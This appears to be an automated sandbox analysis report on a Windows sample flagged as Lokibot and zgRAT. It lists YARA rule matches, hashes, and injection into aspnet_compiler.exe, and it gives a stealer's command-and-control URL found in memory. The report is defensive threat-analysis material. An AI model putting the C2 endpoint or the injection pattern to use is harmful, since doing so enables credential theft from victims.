                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 05 Dec 2024 16:08:52 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aXDuLr5yd7B6aJd%2BuLl5EwxNocMfvrsLYims54n29GsBiRzWxc57q5vMQwBjVHFP8jUmxGjuN3aExQLh%2BDMyjKIEyWoaaLe4nXcgSPWgJTFtHZOyufmUwCYBKXkrzA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ed54c1fd95541e6-EWRData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]-->
                      Source: aspnet_compiler.exe, aspnet_compiler.exe, 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                      Source: aspnet_compiler.exe, 00000002.00000002.2182495250.0000000000E48000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000002.00000002.2182210886.00000000004A0000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://dddotx.shop/Mine/PWS/fre.php
                      Source: aspnet_compiler.exe, 00000002.00000002.2182495250.0000000000E48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dddotx.shop/Mine/PWS/fre.phpH
                      Source: aspnet_compiler.exe, 00000002.00000002.2182679778.0000000002E4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000002.00000002.2182495250.0000000000E48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 6SQADa3zKv.exe, type: SAMPLEMatched rule: Detects zgRAT Author: ditekSHen
                      Source: 0.0.6SQADa3zKv.exe.410000.0.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                      Source: 0.2.6SQADa3zKv.exe.384ab08.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 0.2.6SQADa3zKv.exe.384ab08.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 0.2.6SQADa3zKv.exe.384ab08.3.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                      Source: 0.2.6SQADa3zKv.exe.384ab08.3.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                      Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 0.2.6SQADa3zKv.exe.384ab08.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 0.2.6SQADa3zKv.exe.384ab08.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 0.2.6SQADa3zKv.exe.384ab08.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                      Source: 0.2.6SQADa3zKv.exe.384ab08.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 0.2.6SQADa3zKv.exe.384ab08.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                      Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 00000000.00000002.2123958645.000000000384A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 00000000.00000002.2123958645.000000000384A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 00000000.00000002.2123958645.000000000384A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                      Source: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 00000000.00000002.2123823559.000000000282F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 00000000.00000002.2123823559.000000000282F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 00000000.00000002.2123823559.000000000282F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: Process Memory Space: 6SQADa3zKv.exe PID: 5948, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: Process Memory Space: aspnet_compiler.exe PID: 5748, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeCode function: 0_2_00C872690_2_00C87269
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeCode function: 0_2_00C80B880_2_00C80B88
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeCode function: 0_2_00C80B780_2_00C80B78
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeCode function: 0_2_00C874B90_2_00C874B9
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeCode function: 0_2_00C8747B0_2_00C8747B
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeCode function: 0_2_00C875BA0_2_00C875BA
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeCode function: 0_2_00C876850_2_00C87685
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeCode function: 0_2_00C876660_2_00C87666
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0040549C2_2_0040549C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_004029D42_2_004029D4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 0041219C appears 45 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00405B6F appears 42 times
                      Source: 6SQADa3zKv.exe, 00000000.00000002.2123737399.00000000027AA000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs 6SQADa3zKv.exe
                      Source: 6SQADa3zKv.exe, 00000000.00000002.2123151213.00000000009BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 6SQADa3zKv.exe
                      Source: 6SQADa3zKv.exe, 00000000.00000002.2123697598.0000000002760000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameBATMAN.dll. vs 6SQADa3zKv.exe
                      Source: 6SQADa3zKv.exe, 00000000.00000000.2119240963.0000000000440000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameOct21.exe, vs 6SQADa3zKv.exe
                      Source: 6SQADa3zKv.exe, 00000000.00000002.2123823559.00000000027E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBATMAN.dll. vs 6SQADa3zKv.exe
                      Source: 6SQADa3zKv.exe, 00000000.00000002.2123958645.000000000388D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs 6SQADa3zKv.exe
                      Source: 6SQADa3zKv.exeBinary or memory string: OriginalFilenameOct21.exe, vs 6SQADa3zKv.exe
                      Source: 6SQADa3zKv.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                      Source: 6SQADa3zKv.exe, type: SAMPLEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                      Source: 0.0.6SQADa3zKv.exe.410000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                      Source: 0.2.6SQADa3zKv.exe.384ab08.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 0.2.6SQADa3zKv.exe.384ab08.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 0.2.6SQADa3zKv.exe.384ab08.3.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 0.2.6SQADa3zKv.exe.384ab08.3.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: 0.2.6SQADa3zKv.exe.384ab08.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 0.2.6SQADa3zKv.exe.384ab08.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 0.2.6SQADa3zKv.exe.384ab08.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 0.2.6SQADa3zKv.exe.384ab08.3.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 0.2.6SQADa3zKv.exe.384ab08.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: 00000000.00000002.2123958645.000000000384A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 00000000.00000002.2123958645.000000000384A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 00000000.00000002.2123958645.000000000384A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: 00000000.00000002.2123823559.000000000282F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 00000000.00000002.2123823559.000000000282F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 00000000.00000002.2123823559.000000000282F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: Process Memory Space: 6SQADa3zKv.exe PID: 5948, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: Process Memory Space: aspnet_compiler.exe PID: 5748, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 6SQADa3zKv.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/3@1/1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,2_2_0040650A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,2_2_0040434D
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\6SQADa3zKv.exe.logJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeMutant created: NULL
                      Source: 6SQADa3zKv.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 6SQADa3zKv.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: 6SQADa3zKv.exeReversingLabs: Detection: 60%
                      Source: unknownProcess created: C:\Users\user\Desktop\6SQADa3zKv.exe "C:\Users\user\Desktop\6SQADa3zKv.exe"
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeSection loaded: version.dllJump to behavior
